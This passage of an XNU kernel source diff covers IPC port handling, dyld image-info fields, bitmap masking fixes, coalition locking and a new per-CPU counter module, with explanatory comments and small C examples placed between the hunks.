+               }
+               /* space is locked and active */
+               if (entry->ie_object == ip_to_object(sright) ||
+                   IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_DEAD_NAME) {
+                       (void)ipc_right_dealloc(current_space(), copyout_names[i], entry); /* unlocks space */
+               } else {
+                       is_write_unlock(current_space());
+               }
+
+               /* space is unlocked */
+               ip_release(sright);
+       }
+
+       return kr;
+}
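The failure path above has to unwind names that were already copied out: each one is deallocated from the task's IPC space (unless userspace already reused the name) and the temporary port reference is dropped. As a hedged userspace analogue of that name/right bookkeeping, using only the public Mach calls rather than the in-kernel ipc_right_* routines:

#include <mach/mach.h>
#include <mach/mach_error.h>
#include <stdio.h>

int main(void)
{
    mach_port_t name = MACH_PORT_NULL;
    kern_return_t kr;

    /* Create a receive right; the kernel picks a name in this task's IPC space. */
    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "mach_port_allocate: %s\n", mach_error_string(kr));
        return 1;
    }

    /* Add a send right under the same name, roughly what a copied-out right becomes. */
    kr = mach_port_insert_right(mach_task_self(), name, name, MACH_MSG_TYPE_MAKE_SEND);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "mach_port_insert_right: %s\n", mach_error_string(kr));
        return 1;
    }

    /* Undo: drop the send right, the userspace counterpart of deallocating the name. */
    (void)mach_port_deallocate(mach_task_self(), name);

    /* Remove the receive right as well, which destroys the name entirely. */
    (void)mach_port_mod_refs(mach_task_self(), name, MACH_PORT_RIGHT_RECEIVE, -1);
    return 0;
}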
index 0ed0d93321cbd2011bb6a0ccd0a645c3a29ff1d1..f073413655768969c23d517ad3af183dae44ce87 100644 (file)
@@ -79,7 +79,6 @@
 
 #include <kern/kern_types.h>
 #include <kern/assert.h>
-#include <kern/counters.h>
 #include <kern/cpu_number.h>
 #include <kern/ipc_kobject.h>
 #include <kern/ipc_mig.h>
@@ -795,7 +794,7 @@ msg_receive_error(
        }
 }
 
-static mach_msg_fetch_filter_policy_cbfunc_t mach_msg_fetch_filter_policy_callback = NULL;
+static SECURITY_READ_ONLY_LATE(mach_msg_fetch_filter_policy_cbfunc_t) mach_msg_fetch_filter_policy_callback = NULL;
 
 kern_return_t
 mach_msg_filter_register_callback(
index 2c0a4d854b4b4dd86fc18cf41c422c67931132e4..deaa574ac292130e273ab55f319b879945624d8e 100644 (file)
@@ -80,7 +80,6 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_map.h>
 #include <kern/task.h>
-#include <kern/counters.h>
 #include <kern/thread.h>
 #include <kern/exc_guard.h>
 #include <mach/mach_port_server.h>
@@ -1844,7 +1843,8 @@ mach_port_extract_right(
        }
 
        kr = ipc_object_copyin(space, name, msgt_name, (ipc_object_t *) poly, 0, NULL,
-           IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           (space == current_space() && msgt_name == MACH_MSG_TYPE_COPY_SEND) ?
+           IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND : IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND);
 
        if (kr == KERN_SUCCESS) {
                *polyPoly = ipc_object_copyin_type(msgt_name);
@@ -2473,6 +2473,30 @@ mach_port_guard_exception(
        thread_guard_violation(t, code, subcode, fatal);
 }
 
+/*
+ * Temporary wrapper for immovable mach port guard exception.
+ *
+ * Condition: !(ip_is_control(port) && !immovable_control_port_enabled)
+ */
+void
+mach_port_guard_exception_immovable(
+       mach_port_name_t        name,
+       mach_port_t             port,
+       uint64_t                portguard)
+{
+       if (ip_is_control(port) && immovable_control_port_enabled) {
+               mach_port_guard_exception(name, 0, portguard,
+                   ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD ?
+                   kGUARD_EXC_IMMOVABLE : kGUARD_EXC_IMMOVABLE_NON_FATAL);
+       } else if (!ip_is_control(port)) {
+               /* always fatal exception for non-control port violation */
+               mach_port_guard_exception(name, 0, portguard, kGUARD_EXC_IMMOVABLE);
+       } else {
+               /* ip_is_control(port) && !immovable_control_port_enabled */
+               panic("mach_port_guard_exception_immovable: condition does not hold.");
+       }
+}
+
 
 /*
  *     Routine:        mach_port_guard_ast
index 5b24a9885f2cd9f38c1517f6b98f56ee9bdeb8f2..852a850b580fbc529d10e9edb43939ffb1385008 100644 (file)
@@ -92,6 +92,11 @@ extern void mach_port_guard_exception(
        uint64_t      inguard,
        uint64_t      portguard,
        unsigned      reason);
+
+extern void mach_port_guard_exception_immovable(
+       mach_port_name_t        name,
+       mach_port_t             port,
+       uint64_t                portguard);
 __END_DECLS
 
 #endif  /* _IPC_PORT_H_ */
index 289c5d4d03da0c40e8a013762495db046d11b317..ecfaf24dc4bf38454da829f78e66585a20c7851f 100644 (file)
@@ -35,6 +35,9 @@
 #define DYLD_ALL_IMAGE_INFOS_ADDRESS_MINIMUM_VERSION    9
 #define DYLD_ALL_IMAGE_INFOS_TIMESTAMP_MINIMUM_VERSION  15
 
+#define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8
+#define DYLD_PROCESS_INFO_NOTIFY_MAGIC 0x49414E46
+
 /* Re-use dyld format for kext load addresses */
 #if __LP64__
 typedef struct user64_dyld_uuid_info kernel_uuid_info;
@@ -90,7 +93,9 @@ struct user32_dyld_all_image_infos {
        /* the following field is only in version 15 (Mac OS X 10.12, iOS 10.0) and later */
        user32_addr_t   sharedCacheBaseAddress;
        uint64_t        timestamp;
-       user32_addr_t   reserved[14];
+       user32_addr_t   dyldpath;
+       mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       user32_addr_t   reserved[5];
        /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */
        user32_addr_t compact_dyld_image_info_addr;
        user32_size_t compact_dyld_image_info_size;
@@ -128,7 +133,9 @@ struct user64_dyld_all_image_infos {
        /* the following field is only in version 15 (macOS 10.12, iOS 10.0) and later */
        user64_addr_t   sharedCacheBaseAddress;
        uint64_t        timestamp;
-       user64_addr_t   reserved[14];
+       user64_addr_t   dyldPath;
+       mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       user64_addr_t   reserved[9];
        /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */
        user64_addr_t compact_dyld_image_info_addr;
        user64_size_t compact_dyld_image_info_size;
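Repurposing the reserved slots keeps both all_image_infos layouts the same size: one path pointer plus eight 4-byte port names plus the shrunken reserved array still occupies the old reserved[14] footprint. A small compile-time check of that arithmetic, with hypothetical stand-in typedefs for the kernel-private user32/user64 address types:

#include <stdint.h>

/* Hypothetical stand-ins for the kernel-private user32/user64 types. */
typedef uint32_t user32_addr_t;
typedef uint64_t user64_addr_t;
typedef uint32_t mach_port_name_t;

#define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8

/* 64-bit: dyldPath + notifyMachPorts[8] + reserved[9] fills the old reserved[14]. */
_Static_assert(sizeof(user64_addr_t) +
    DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(mach_port_name_t) +
    9 * sizeof(user64_addr_t) == 14 * sizeof(user64_addr_t),
    "user64 all_image_infos size unchanged");

/* 32-bit: dyldpath + notifyMachPorts[8] + reserved[5] fills the old reserved[14]. */
_Static_assert(sizeof(user32_addr_t) +
    DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(mach_port_name_t) +
    5 * sizeof(user32_addr_t) == 14 * sizeof(user32_addr_t),
    "user32 all_image_infos size unchanged");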
index 42b7559005bce11f51f7e7fd78d51e65d057746e..2ef4d343dfb53e6fc1974f30e57803f9b30d4b27 100644 (file)
@@ -623,21 +623,30 @@ machine_trace_thread64(thread_t thread,
                pc = get_saved_state_pc(state);
                sp = get_saved_state_sp(state);
        } else {
-               /* kstackptr may not always be there, so recompute it */
-               struct arm_kernel_saved_state * state = &thread_get_kernel_state(thread)->machine.ss;
-               stacklimit = VM_MAX_KERNEL_ADDRESS;
-               stacklimit_bottom = VM_MIN_KERNEL_ADDRESS;
-               bt_vm_map = kernel_map;
+               struct arm_saved_state *state = thread->machine.kpcb;
+               if (state != NULL) {
+                       if (fp == 0) {
+                               fp = state->ss_64.fp;
+                       }
 
-               /* Get the frame pointer */
-               if (fp == 0) {
-                       fp = state->fp;
+                       prevlr = state->ss_64.lr;
+                       pc = state->ss_64.pc;
+                       sp = state->ss_64.sp;
+               } else {
+                       /* kstackptr may not always be there, so recompute it */
+                       arm_kernel_saved_state_t *kstate = &thread_get_kernel_state(thread)->machine.ss;
+
+                       if (fp == 0) {
+                               fp = kstate->fp;
+                       }
+                       prevlr = kstate->lr;
+                       pc = kstate->pc;
+                       sp = kstate->sp;
                }
 
-               /* Fill in the current link register */
-               prevlr = state->lr;
-               pc = state->pc;
-               sp = state->sp;
+               stacklimit = VM_MAX_KERNEL_ADDRESS;
+               stacklimit_bottom = VM_MIN_KERNEL_ADDRESS;
+               bt_vm_map = kernel_map;
        }
 
        if (!user_p && !prevlr && !fp && !sp && !pc) {
index 7d2ddfc5e0aa0b385b36ecd7f927500cf515e857..42da7337bf340fed1aad2bcfc5845877b973d96a 100644 (file)
@@ -39,10 +39,12 @@ EXPORT_FILES = \
        circle_queue.h \
        clock.h \
        coalition.h \
+       counter.h  \
        cpu_number.h \
        cpu_data.h \
        energy_perf.h \
        extmod_statistics.h \
+       hv_io_notifier.h \
        hv_support.h \
        hv_support_kext.h \
        ipc_mig.h \
@@ -56,6 +58,7 @@ EXPORT_FILES = \
        locks.h \
        lock_group.h \
        host.h \
+       hvg_hypercall.h \
        mach_param.h \
        macro_help.h \
        mpqueue.h \
index d0e3415297d97e78c30557f286a1ab8fbf6e9137..0c38b3a26d1fe088cc5c721946c6ec849f8d2ed6 100644 (file)
@@ -55,7 +55,7 @@
  */
 
 #include <kern/ast.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/cpu_quiesce.h>
 #include <kern/misc_protos.h>
 #include <kern/queue.h>
@@ -132,8 +132,6 @@ ast_taken_kernel(void)
 
        assert(urgent_reason & AST_PREEMPT);
 
-       counter(c_ast_taken_block++);
-
        thread_block_reason(THREAD_CONTINUE_NULL, NULL, urgent_reason);
 
        assert(ml_get_interrupts_enabled() == FALSE);
@@ -311,7 +309,6 @@ ast_taken_user(void)
 #endif
 
                if (preemption_reasons & AST_PREEMPT) {
-                       counter(c_ast_taken_block++);
                        /* switching to a continuation implicitly re-enables interrupts */
                        thread_block_reason(thread_preempted, NULL, preemption_reasons);
                        /* NOTREACHED */
index 991941f57cea87e5cf45d4bb9fec4785d595a615..62b671d9ed87e15af4e81a73f806aade64e0279f 100644 (file)
@@ -59,7 +59,7 @@ audit_session_mksend(struct auditinfo_addr *aia_p, ipc_port_t *sessionport)
 {
        audit_session_aiaref(aia_p);
        if (!ipc_kobject_make_send_lazy_alloc_port(sessionport,
-           (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, false, 0)) {
+           (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                audit_session_aiaunref(aia_p);
        }
 
index 89012eb5a2be5eaa1fa2dc681e360ba005428015..045ed96217f18ec6ee1d41285d87e1dccab03930 100644 (file)
@@ -312,9 +312,17 @@ bitmap_first(bitmap_t *map, uint nbits)
 inline static void
 bitmap_not(bitmap_t *out, const bitmap_t *in, uint nbits)
 {
-       for (uint i = 0; i <= bitmap_index(nbits - 1); i++) {
+       uint i;
+
+       for (i = 0; i < bitmap_index(nbits - 1); i++) {
                out[i] = ~in[i];
        }
+
+       uint nbits_complete = i * 64;
+
+       if (nbits > nbits_complete) {
+               out[i] = ~in[i] & mask(nbits - nbits_complete);
+       }
 }
 
 inline static void
@@ -328,9 +336,17 @@ bitmap_and(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits)
 inline static void
 bitmap_and_not(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits)
 {
-       for (uint i = 0; i <= bitmap_index(nbits - 1); i++) {
+       uint i;
+
+       for (i = 0; i < bitmap_index(nbits - 1); i++) {
                out[i] = in1[i] & ~in2[i];
        }
+
+       uint nbits_complete = i * 64;
+
+       if (nbits > nbits_complete) {
+               out[i] = (in1[i] & ~in2[i]) & mask(nbits - nbits_complete);
+       }
 }
 
 inline static bool
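The rewritten loops stop one word early and mask the final word so that bits at positions >= nbits can never be set by the complement; previously ~in[i] could leak set bits past the end of the bitmap. A standalone sketch of the same masking idea, with hypothetical local helpers standing in for the kernel's bitmap_index()/mask():

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

typedef uint64_t bitmap_t;

#define BITMAP_INDEX(bit)   ((bit) >> 6)          /* word holding this bit */
#define BITMAP_MASK(width)  (((width) >= 64) ? ~0ULL : ((1ULL << (width)) - 1ULL))

/* Complement 'in' into 'out', keeping bits >= nbits clear in the last word. */
static void
bitmap_not_sketch(bitmap_t *out, const bitmap_t *in, unsigned nbits)
{
    unsigned i;

    for (i = 0; i < BITMAP_INDEX(nbits - 1); i++) {
        out[i] = ~in[i];
    }

    unsigned nbits_complete = i * 64;
    if (nbits > nbits_complete) {
        out[i] = ~in[i] & BITMAP_MASK(nbits - nbits_complete);
    }
}

int main(void)
{
    bitmap_t in[2] = { 0, 0 }, out[2];

    bitmap_not_sketch(out, in, 72);          /* 72 bits: one full word + 8 bits */
    assert(out[0] == ~0ULL);
    assert(out[1] == 0xffULL);               /* only the low 8 bits of word 1 are set */
    printf("last word: 0x%llx\n", (unsigned long long)out[1]);
    return 0;
}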
index cb46e621be064755251e908b4758e1f8d15244da..aafd7130138d36d8a64be3e307bc566068ea4447 100644 (file)
@@ -324,7 +324,7 @@ get_task_map_reference(task_t t)
                return VM_MAP_NULL;
        }
        m = t->map;
-       vm_map_reference_swap(m);
+       vm_map_reference(m);
        task_unlock(t);
        return m;
 }
@@ -768,6 +768,12 @@ get_vmmap_size(
 {
        return vm_map_adjusted_size(map);
 }
+int
+get_task_page_size(
+       task_t task)
+{
+       return vm_map_page_size(task->map);
+}
 
 #if CONFIG_COREDUMP
 
@@ -1016,7 +1022,7 @@ fill_taskprocinfo(task_t task, struct proc_taskinfo_internal * ptinfo)
        ptinfo->pti_threads_system = tinfo.threads_system;
        ptinfo->pti_threads_user = tinfo.threads_user;
 
-       ptinfo->pti_faults = task->faults;
+       ptinfo->pti_faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX);
        ptinfo->pti_pageins = task->pageins;
        ptinfo->pti_cow_faults = task->cow_faults;
        ptinfo->pti_messages_sent = task->messages_sent;
index e77ca4e68fb07a21094e9246519fe01d82cc32ee..af789e0b2f7fba8739d5d664d00b435a55cce6fc 100644 (file)
@@ -89,7 +89,7 @@ int merge_adaptive_coalitions;
 LCK_GRP_DECLARE(coalitions_lck_grp, "coalition");
 
 /* coalitions_list_lock protects coalition_count, coalitions queue, next_coalition_id. */
-static LCK_MTX_DECLARE(coalitions_list_lock, &coalitions_lck_grp);
+static LCK_RW_DECLARE(coalitions_list_lock, &coalitions_lck_grp);
 static uint64_t coalition_count;
 static uint64_t coalition_next_id = 1;
 static queue_head_t coalitions_q;
@@ -1198,7 +1198,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t
 
        lck_mtx_init(&new_coal->lock, &coalitions_lck_grp, LCK_ATTR_NULL);
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_exclusive(&coalitions_list_lock);
        new_coal->id = coalition_next_id++;
        coalition_count++;
        enqueue_tail(&coalitions_q, &new_coal->coalitions);
@@ -1215,7 +1215,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t
 #endif
        cid = new_coal->id;
        ctype = new_coal->type;
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_exclusive(&coalitions_list_lock);
 
        coal_dbg("id:%llu, type:%s", cid, coal_type_str(ctype));
 
@@ -1281,22 +1281,29 @@ coalition_release(coalition_t coal)
  * coalition_find_by_id_internal
  * Returns: Coalition object with specified id, NOT referenced.
  *          If not found, returns COALITION_NULL.
- * Condition: coalitions_list_lock must be LOCKED.
+ *          If found, returns a locked coalition.
+ *
+ * Condition: No locks held
  */
 static coalition_t
 coalition_find_by_id_internal(uint64_t coal_id)
 {
+       coalition_t coal;
+
        if (coal_id == 0) {
                return COALITION_NULL;
        }
 
-       lck_mtx_assert(&coalitions_list_lock, LCK_MTX_ASSERT_OWNED);
-       coalition_t coal;
+       lck_rw_lock_shared(&coalitions_list_lock);
        qe_foreach_element(coal, &coalitions_q, coalitions) {
                if (coal->id == coal_id) {
+                       coalition_lock(coal);
+                       lck_rw_unlock_shared(&coalitions_list_lock);
                        return coal;
                }
        }
+       lck_rw_unlock_shared(&coalitions_list_lock);
+
        return COALITION_NULL;
 }
 
@@ -1308,23 +1315,16 @@ coalition_find_by_id_internal(uint64_t coal_id)
 coalition_t
 coalition_find_by_id(uint64_t cid)
 {
-       if (cid == 0) {
-               return COALITION_NULL;
-       }
-
-       lck_mtx_lock(&coalitions_list_lock);
-
        coalition_t coal = coalition_find_by_id_internal(cid);
+
        if (coal == COALITION_NULL) {
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
-       coalition_lock(coal);
+       /* coal is locked */
 
        if (coal->reaped) {
                coalition_unlock(coal);
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
@@ -1338,7 +1338,6 @@ coalition_find_by_id(uint64_t cid)
 #endif
 
        coalition_unlock(coal);
-       lck_mtx_unlock(&coalitions_list_lock);
 
        coal_dbg("id:%llu type:%s ref_count:%u",
            coal->id, coal_type_str(coal->type), rc);
@@ -1357,25 +1356,18 @@ coalition_find_by_id(uint64_t cid)
 coalition_t
 coalition_find_and_activate_by_id(uint64_t cid)
 {
-       if (cid == 0) {
-               return COALITION_NULL;
-       }
-
-       lck_mtx_lock(&coalitions_list_lock);
-
        coalition_t coal = coalition_find_by_id_internal(cid);
+
        if (coal == COALITION_NULL) {
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
-       coalition_lock(coal);
+       /* coal is locked */
 
        if (coal->reaped || coal->terminated) {
                /* Too late to put something new into this coalition, it's
                 * already on its way out the door */
                coalition_unlock(coal);
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
@@ -1393,7 +1385,6 @@ coalition_find_and_activate_by_id(uint64_t cid)
 #endif
 
        coalition_unlock(coal);
-       lck_mtx_unlock(&coalitions_list_lock);
 
        coal_dbg("id:%llu type:%s ref_count:%u, active_count:%u",
            coal->id, coal_type_str(coal->type), rc, ac);
@@ -2003,10 +1994,10 @@ coalition_reap_internal(coalition_t coal)
 
        coalition_unlock(coal);
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_exclusive(&coalitions_list_lock);
        coalition_count--;
        remqueue(&coal->coalitions);
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_exclusive(&coalitions_list_lock);
 
        /* Release the list's reference and launchd's reference. */
        coalition_release(coal);
@@ -2116,7 +2107,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz)
        int ncoals = 0;
        struct coalition *coal;
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_shared(&coalitions_list_lock);
        qe_foreach_element(coal, &coalitions_q, coalitions) {
                if (!coal->reaped && (type < 0 || type == (int)coal->type)) {
                        if (coal_list && ncoals < list_sz) {
@@ -2125,7 +2116,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz)
                        ++ncoals;
                }
        }
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_shared(&coalitions_list_lock);
 
        return ncoals;
 }
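The hunks above convert coalitions_list_lock from a mutex to a reader/writer lock and move the per-coalition lock acquisition into coalition_find_by_id_internal, so lookups can run concurrently while each caller still receives a locked coalition. A minimal userspace sketch of that hand-over-hand pattern, using pthread primitives as stand-ins for the kernel lock APIs:

#include <pthread.h>
#include <stddef.h>
#include <stdint.h>

struct coal {
    uint64_t        id;
    pthread_mutex_t lock;        /* per-object lock */
    struct coal    *next;
};

static pthread_rwlock_t list_lock = PTHREAD_RWLOCK_INITIALIZER;
static struct coal     *list_head;

/* Return the matching object with its own lock held, or NULL. */
static struct coal *
find_and_lock(uint64_t id)
{
    struct coal *c;

    pthread_rwlock_rdlock(&list_lock);           /* readers may search in parallel */
    for (c = list_head; c != NULL; c = c->next) {
        if (c->id == id) {
            pthread_mutex_lock(&c->lock);        /* pin the object... */
            pthread_rwlock_unlock(&list_lock);   /* ...then drop the list lock */
            return c;
        }
    }
    pthread_rwlock_unlock(&list_lock);
    return NULL;
}

int main(void)
{
    static struct coal c1 = { .id = 42, .lock = PTHREAD_MUTEX_INITIALIZER, .next = NULL };
    list_head = &c1;

    struct coal *c = find_and_lock(42);
    if (c != NULL) {
        /* ... use the object ... */
        pthread_mutex_unlock(&c->lock);
    }
    return 0;
}

The ordering stays deadlock-free as long as nothing takes the list lock while holding an object lock, which matches coalition_reap_internal above: it drops the coalition lock before taking the list lock exclusively.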
diff --git a/osfmk/kern/counter.h b/osfmk/kern/counter.h
new file mode 100644 (file)
index 0000000..f7a43fa
--- /dev/null
@@ -0,0 +1,231 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+#ifdef XNU_KERNEL_PRIVATE
+
+#ifndef _KERN_COUNTER_H
+#define _KERN_COUNTER_H
+
+/*!
+ * @file <kern/counter.h>
+ *
+ * @brief
+ * Module for working with 64bit relaxed atomic counters.
+ *
+ * @discussion
+ * Different counter types have different speed-memory tradeoffs, but
+ * they all share a common interface.
+ *
+ * Counters can be statically allocated or dynamically allocated.
+ *
+ * Statically allocated counters are always backed by per-cpu storage, which means
+ * writes take place on the current CPU's value and reads sum all of the per-cpu values.
+ *
+ * Dynamically allocated counters can be either per-cpu or use a single 64bit value.
+ * To create a per-cpu counter, use the scalable_counter_t type. Note that this
+ * trades off additional memory for better scalability.
+ * To create a single 64bit counter, use the atomic_counter_t type.
+ *
+ * For most counters you can just use the counter_t type and the choice of
+ * scalable or atomic will be made at compile time based on the target.
+ *
+ * The counter types are opaque handles. They ARE NOT COPYABLE. If you need
+ * to make a copy of a counter, you should do so like this:
+ * <code>
+ * counter_t original;
+ * ...
+ * counter_t copy;
+ * counter_alloc(&copy);
+ * counter_add(&copy, counter_load(&original));
+ * ...
+ * // Make sure to free them at some point.
+ * counter_free(&original);
+ * counter_free(&copy);
+ * </code>
+ *
+ * Static counter example:
+ * <code>
+ * SCALABLE_COUNTER_DEFINE(my_counter);
+ * ...
+ * counter_inc(&my_counter);
+ * assert(counter_load(&my_counter) == 1);
+ * </code>
+ *
+ * Dynamic Counter Example:
+ * <code>
+ * scalable_counter_t my_scalable_counter;
+ * atomic_counter_t my_atomic_counter;
+ * counter_t my_counter;
+ *
+ * // All three counters share the same interface. So to change the speed-memory
+ * // tradeoff, just change the type.
+ * counter_alloc(&my_scalable_counter);
+ * counter_alloc(&my_atomic_counter);
+ * counter_alloc(&my_counter);
+ *
+ * counter_inc(&my_scalable_counter);
+ * counter_inc(&my_atomic_counter);
+ * counter_inc(&my_counter);
+ *
+ * assert(counter_load(&my_scalable_counter) == 1);
+ * assert(counter_load(&my_atomic_counter) == 1);
+ * assert(counter_load(&my_counter) == 1);
+ * </code>
+ */
+
+#include <mach/mach_types.h>
+#include <kern/macro_help.h>
+#include <kern/startup.h>
+#include <kern/zalloc.h>
+
+typedef __zpercpu uint64_t *scalable_counter_t;
+typedef uint64_t atomic_counter_t;
+/* Generic counter base type. Does not have an implementation. */
+struct generic_counter_t;
+
+/*!
+ * @macro SCALABLE_COUNTER_DECLARE
+ *
+ * @abstract
+ * (optionally) declares a static per-cpu counter (in a header).
+ *
+ * @param name          the name of the counter.
+ */
+#define SCALABLE_COUNTER_DECLARE(name) \
+       extern scalable_counter_t name;
+
+/*!
+ * @macro SCALABLE_COUNTER_DEFINE
+ *
+ * @abstract
+ * Defines a static per-cpu counter.
+ * Counter can only be accessed after the TUNABLES phase of startup.
+ *
+ * @param name          the name of the counter.
+ */
+#define SCALABLE_COUNTER_DEFINE(name) \
+       __startup_data uint64_t __ ##name##_early_storage = 0;                                   \
+       scalable_counter_t name = {&__##name##_early_storage};                                   \
+       STARTUP_ARG(TUNABLES, STARTUP_RANK_MIDDLE, scalable_counter_static_boot_mangle, &name);  \
+       STARTUP_ARG(PERCPU, STARTUP_RANK_SECOND, scalable_counter_static_init, &name);
+
+/*
+ * Initialize a per-cpu counter.
+ * May block and will never fail.
+ * This counter must be freed with counter_free.
+ */
+OS_OVERLOADABLE
+extern void counter_alloc(struct generic_counter_t *);
+
+OS_OVERLOADABLE
+extern void counter_free(struct generic_counter_t *);
+/*
+ * Add amount to counter.
+ * @param amount: The amount to add.
+ */
+OS_OVERLOADABLE
+extern void counter_add(struct generic_counter_t *, uint64_t amount);
+
+/*
+ * Add 1 to this counter.
+ */
+OS_OVERLOADABLE
+extern void counter_inc(struct generic_counter_t *);
+
+/*
+ * Subtract 1 from this counter.
+ */
+OS_OVERLOADABLE
+extern void counter_dec(struct generic_counter_t *);
+
+/* Variants of the above operations where the caller takes responsibility for disabling preemption. */
+OS_OVERLOADABLE
+extern void counter_add_preemption_disabled(struct generic_counter_t *, uint64_t amount);
+OS_OVERLOADABLE
+extern void counter_inc_preemption_disabled(struct generic_counter_t *);
+OS_OVERLOADABLE
+extern void counter_dec_preemption_disabled(struct generic_counter_t *);
+
+/*
+ * Read the value of the percpu counter.
+ * Note that this will cause synchronization of all the sharded values.
+ */
+OS_OVERLOADABLE
+extern uint64_t counter_load(struct generic_counter_t *);
+
+#pragma mark implementation details
+/* NB: Nothing below here should be used directly. */
+
+__startup_func void scalable_counter_static_boot_mangle(scalable_counter_t *counter);
+__startup_func void scalable_counter_static_init(scalable_counter_t *counter);
+
+#if XNU_TARGET_OS_WATCH || XNU_TARGET_OS_TV
+#define ATOMIC_COUNTER_USE_PERCPU 0
+#else
+#define ATOMIC_COUNTER_USE_PERCPU 1
+#endif /* XNU_TARGET_OS_WATCH || XNU_TARGET_OS_TV */
+
+#if ATOMIC_COUNTER_USE_PERCPU
+typedef scalable_counter_t counter_t;
+#else
+typedef atomic_counter_t counter_t;
+#endif /* ATOMIC_COUNTER_USE_PERCPU */
+
+#define COUNTER_MAKE_PROTOTYPES(counter_t)                                 \
+OS_OVERLOADABLE                                                            \
+extern void counter_alloc(counter_t *);                                    \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_free(counter_t *);                                     \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_add(counter_t *, uint64_t amount);                     \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_inc(counter_t *);                                      \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_dec(counter_t *);                                      \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_add_preemption_disabled(counter_t *, uint64_t amount); \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_inc_preemption_disabled(counter_t *);                  \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_dec_preemption_disabled(counter_t *);                  \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern uint64_t counter_load(counter_t *);
+
+COUNTER_MAKE_PROTOTYPES(scalable_counter_t);
+COUNTER_MAKE_PROTOTYPES(atomic_counter_t);
+
+#endif /* _KERN_COUNTER_H */
+
+#endif /* XNU_KERNEL_PRIVATE */
diff --git a/osfmk/kern/counter_common.c b/osfmk/kern/counter_common.c
new file mode 100644 (file)
index 0000000..9b12132
--- /dev/null
@@ -0,0 +1,165 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
